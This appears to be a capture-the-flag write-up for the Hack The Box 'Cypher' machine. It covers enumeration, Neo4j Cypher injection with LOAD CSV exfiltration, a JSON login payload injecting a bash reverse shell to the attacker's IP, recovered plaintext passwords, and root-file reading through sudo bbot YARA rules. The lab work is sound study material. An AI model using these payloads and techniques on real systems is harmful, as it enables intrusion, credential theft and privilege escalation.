1306 words

7 minutes

Cypher

2025-03-23

Hack The Box

/

Linux

/

Neo4j Injection

User Flag#

Nmap Scan#

As always we start with an Nmap scan

1
# Nmap 7.94SVN scan initiated Sat Mar  1 22:40:25 2025 as: nmap -Pn -p- -A --min-rate 5000 -oN scan.txt 10.10.11.57
2
Nmap scan report for 10.10.11.57 (10.10.11.57)
3
Host is up (0.050s latency).
4
Not shown: 65533 closed tcp ports (reset)
5
PORT   STATE SERVICE VERSION
6
22/tcp open  ssh     OpenSSH 9.6p1 Ubuntu 3ubuntu13.8 (Ubuntu Linux; protocol 2.0)
7
| ssh-hostkey:
8
|   256 be:68:db:82:8e:63:32:45:54:46:b7:08:7b:3b:52:b0 (ECDSA)
9
|_  256 e5:5b:34:f5:54:43:93:f8:7e:b6:69:4c:ac:d6:3d:23 (ED25519)
10
80/tcp open  http    nginx 1.24.0 (Ubuntu)
11
|_http-title: Did not follow redirect to http://cypher.htb/
12
|_http-server-header: nginx/1.24.0 (Ubuntu)
13
Device type: general purpose
14
Running: Linux 5.X
15
OS CPE: cpe:/o:linux:linux_kernel:5.0
16
OS details: Linux 5.0
17
Network Distance: 2 hops
18
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
19

20
TRACEROUTE (using port 1025/tcp)
21
HOP RTT      ADDRESS
22
1   50.10 ms 10.10.14.1 (10.10.14.1)
23
2   50.16 ms 10.10.11.57 (10.10.11.57)
24

25
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
26
# Nmap done at Sat Mar  1 22:40:50 2025 -- 1 IP address (1 host up) scanned in 24.89 seconds

I added cypher.htbto /etc/hosts

1
echo -e "10.10.11.57\tcypher.htb" | sudo tee -a /etc/hosts
2
10.10.11.57  cypher.htb

Directories enumeration#

1
$ ffuf -u http://cypher.htb/FUZZ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/big.txt
2

3
        /'___\  /'___\           /'___\
4
       /\ \__/ /\ \__/  __  __  /\ \__/
5
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
6
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
7
         \ \_\   \ \_\  \ \____/  \ \_\
8
          \/_/    \/_/   \/___/    \/_/
9

10
       v2.1.0-dev
11
________________________________________________
12

13
 :: Method           : GET
14
 :: URL              : http://cypher.htb/FUZZ
15
 :: Wordlist         : FUZZ: /usr/share/wordlists/SecLists/Discovery/Web-Content/big.txt
16
 :: Follow redirects : false
17
 :: Calibration      : false
18
 :: Timeout          : 10
19
 :: Threads          : 40
20
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
21
________________________________________________
22

23
about                   [Status: 200, Size: 4986, Words: 1117, Lines: 179, Duration: 54ms]
24
api                     [Status: 307, Size: 0, Words: 1, Lines: 1, Duration: 55ms]
25
demo                    [Status: 307, Size: 0, Words: 1, Lines: 1, Duration: 63ms]
26
index                   [Status: 200, Size: 4562, Words: 1285, Lines: 163, Duration: 114ms]
27
login                   [Status: 200, Size: 3671, Words: 863, Lines: 127, Duration: 53ms]
28
testing                 [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 53ms]
29
:: Progress: [20476/20476] :: Job [1/1] :: 732 req/sec :: Duration: [0:00:41] :: Errors: 0 ::

Exploring Exposed Artifacts and Identifying Vulnerabilities#

By navigating to the testing folder I found jar file left exposed by someone I opened it with JD-GUI and found that it contains a class called CustomFunctions, which creates a custom Neo4j function named custom.getUrlStatusCode. It is designed to fetch the HTTP status code for a given URL. The function uses a shell command to execute curl and retrieves the status code. I went back to the login page and started playing with the body of the request. By inserting a ' inside the username object, I triggered an error that indicated a Neo4j syntax issue. The error message revealed that the application was constructing a Cypher query using the provided username and password, and the single quote caused a parsing failure in the query. The error specifically mentioned a syntax error due to an unclosed string literal, which suggests that the input was not being properly sanitized or escaped before being included in the query.

Exploiting Cypher injection#

This behavior points to a potential vulnerability to Cypher injection, similar to SQL injection, where malicious input could manipulate the query’s logic. To exploit this further, I used a simple payload from Neo4jection: Secrets, Data, and Cloud Exploits

1
$ python -m http.server
2
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
3
10.10.11.57 - - [02/Mar/2025 14:30:33] "GET /?l=USER HTTP/1.1" 200 -
4
10.10.11.57 - - [02/Mar/2025 14:30:33] "GET /?l=HASH HTTP/1.1" 200 -
5
10.10.11.57 - - [02/Mar/2025 14:30:33] "GET /?l=DNS_NAME HTTP/1.1" 200 -
6
10.10.11.57 - - [02/Mar/2025 14:30:33] "GET /?l=SHA1 HTTP/1.1" 200 -
7
10.10.11.57 - - [02/Mar/2025 14:30:33] "GET /?l=SCAN HTTP/1.1" 200 -
8
10.10.11.57 - - [02/Mar/2025 14:30:33] "GET /?l=ORG_STUB HTTP/1.1" 200 -
9
10.10.11.57 - - [02/Mar/2025 14:30:33] "GET /?l=IP_ADDRESS HTTP/1.1" 200 -

it’s possible to retrieve the value of a property from the node if we treat it as a map: n[key], so we can use LOAD CSV to exfiltrate the data of the properties we got already And we got the values of the properties.

1
$ python -m http.server
2
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
3
10.10.11.57 - - [02/Mar/2025 14:33:26] "GET /?name=graphasm HTTP/1.1" 200 -
4
10.10.11.57 - - [02/Mar/2025 14:33:45] "GET /?value=9f54ca4c130be6d529a56dee59dc2b2090e43acf HTTP/1.1" 200 -
5
10.10.11.57 - - [02/Mar/2025 14:34:26] "GET /?host=211.255.9.117 HTTP/1.1" 200 -
6
10.10.11.57 - - [02/Mar/2025 14:35:08] "GET /?parent_uuid=d0ba01af-b882-4284-92f4-01412cb123c4 HTTP/1.1" 200 -
7
10.10.11.57 - - [02/Mar/2025 14:35:08] "GET /?scope_distance=0 HTTP/1.1" 200 -
8
10.10.11.57 - - [02/Mar/2025 14:35:08] "GET /?uuid=d0ba01af-b882-4284-92f4-01412cb123c4 HTTP/1.1" 200 -
9
10.10.11.57 - - [02/Mar/2025 14:35:08] "GET /?scan=SCAN:eb3cf8eb641dd2e8005128c2fee4b43e59fd7785 HTTP/1.1" 200 -
10
10.10.11.57 - - [02/Mar/2025 14:35:08] "GET /?type=SCAN HTTP/1.1" 200 -
11
10.10.11.57 - - [02/Mar/2025 14:35:09] "GET /?web_spider_distance=0 HTTP/1.1" 200 -

we have the username graphasm and the SHA1 password hash, I tried to crack the hash but no luck.

Getting a reverse shell#

Do you remember the jar file we found that creates the custom procedure, we can attempt to inject a reverse shell by calling this custom procedure. So I crafted a payload that calls the getUrlStatusCode procedure and inject a revshell

1
{
2
  "username": "' Return 1 Union CALL custom.getUrlStatusCode('http://10.10.14.168:8000/ ; /bin/bash -c \"bash -i >& /dev/tcp/10.10.14.168/4444 0>&1\"') YIELD statusCode AS s RETURN 1 // ",
3
  "password": "anything"
4
}

I sent this request while I had a listener opened on port 4444, and got a revshell as neo4j

Lateral movement#

I typed neo4j —help and noticed this env variable called NEO4J_HOME

1
neo4j@cypher:~$ cd $NEO4J_HOME
2
cd $NEO4J_HOME
3
neo4j@cypher:~$ ls -al
4
ls -al
5
total 68
6
drwxr-xr-x 15 neo4j adm   4096 Mar  3 10:18 .
7
drwxr-xr-x 50 root  root  4096 Feb 17 16:48 ..
8
-rw-r--r--  1 neo4j neo4j   63 Oct  8 18:07 .bash_history
9
drwxr-xr-x  4 neo4j neo4j 4096 Mar  3 08:56 .bbot
10
drwxrwxr-x  3 neo4j adm   4096 Oct  8 18:07 .cache
11
drwxr-xr-x  2 neo4j adm   4096 Aug 16  2024 certificates
12
drwxr-xr-x  3 neo4j neo4j 4096 Mar  3 08:56 .config
13
drwxr-xr-x  6 neo4j adm   4096 Oct  8 18:07 data
14
drwx------  3 neo4j neo4j 4096 Mar  3 10:37 .gnupg
15
drwxr-xr-x  2 neo4j adm   4096 Aug 16  2024 import
16
drwxr-xr-x  2 neo4j adm   4096 Feb 17 16:24 labs
17
drwxr-xr-x  2 neo4j adm   4096 Aug 16  2024 licenses
18
drwxr-xr-x  3 neo4j neo4j 4096 Mar  3 10:18 .local
19
-rw-r--r--  1 neo4j adm     52 Oct  2 15:55 packaging_info
20
drwxr-xr-x  2 neo4j adm   4096 Mar  3 08:41 plugins
21
drwxr-xr-x  2 neo4j adm   4096 Feb 17 16:24 products
22
drwxr-xr-x  2 neo4j adm   4096 Mar  3 07:41 run
23
lrwxrwxrwx  1 neo4j adm      9 Oct  8 18:07 .viminfo -> /dev/null
24
neo4j@cypher:~$

I found a .config folder that contains a folder bbolt that contains two files, bbot.yml and secrets.yml I looked for anything interesting inside these two files and found a credentials for Neo4j database.

1
$ tail secrets.yml && echo
2
#   http:
3
#     username: ''
4
#     password: ''
5
#   websocket:
6
#     token: ''
7
#   splunk:
8
#     hectoken: ''
9
#   neo4j:
10
#     username: neo4j
11
#     password: bbotislife

I tried to access ssh as graphasm with this password but not luck. And, then I displayed the content of .bash_history and found some interesting stuff.

1
$ cat .bash_history
2
neo4j-admin dbms set-initial-password cU4btyib.20xtCMCXkBmerhK

The admin has set a initial password to neo4j. Again, I tried to access ssh as graphasm with this password and I succeded

Privilege escalation#

Let’s check what graphasm can run with sudo:

1
$ graphasm@cypher:~$ sudo -l
2
Matching Defaults entries for graphasm on cypher:
3
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
4

5
User graphasm may run the following commands on cypher:
6
    (ALL) NOPASSWD: /usr/local/bin/bbot

We can see that graphasm has passwordless sudo access to execute /usr/local/bin/bbot.

bbot is a multipurpose scanner built to automate Recon, Bug Bounties, and ASM.
It allows loading and executing custom modules as well as loading custom YARA rules.
We can exploit this feature to read the root flag.

To achieve this, I executed the following command:

1
sudo bbot --custom-yara-rules=/root/root.txt --dry-run -d

--dry-run: Prevents the scan from executing (useful for testing).
-d: Enables debug mode, allowing us to see the content of the imported YARA rule.

By using this method, we can successfully read the root flag.